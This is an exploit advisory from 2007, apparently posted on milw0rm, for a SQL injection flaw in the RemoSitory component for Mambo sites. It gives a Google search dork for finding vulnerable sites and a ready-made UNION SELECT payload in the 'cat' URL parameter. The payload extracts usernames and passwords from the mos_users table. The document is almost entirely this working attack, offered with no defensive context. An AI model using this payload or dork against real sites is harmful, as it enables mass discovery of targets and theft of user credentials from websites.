*******************************************************************************
# Title   :  Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.remository.com/
# $$      :  Free
# Dork    :  inurl:func=selectcat + com_remository   // Result:43.400
# DorkEx  :  http://www.google.com.tr/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]///index.php?option=com_remository&func=selectcat&cat=[SQL]
Example:
//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-08-23]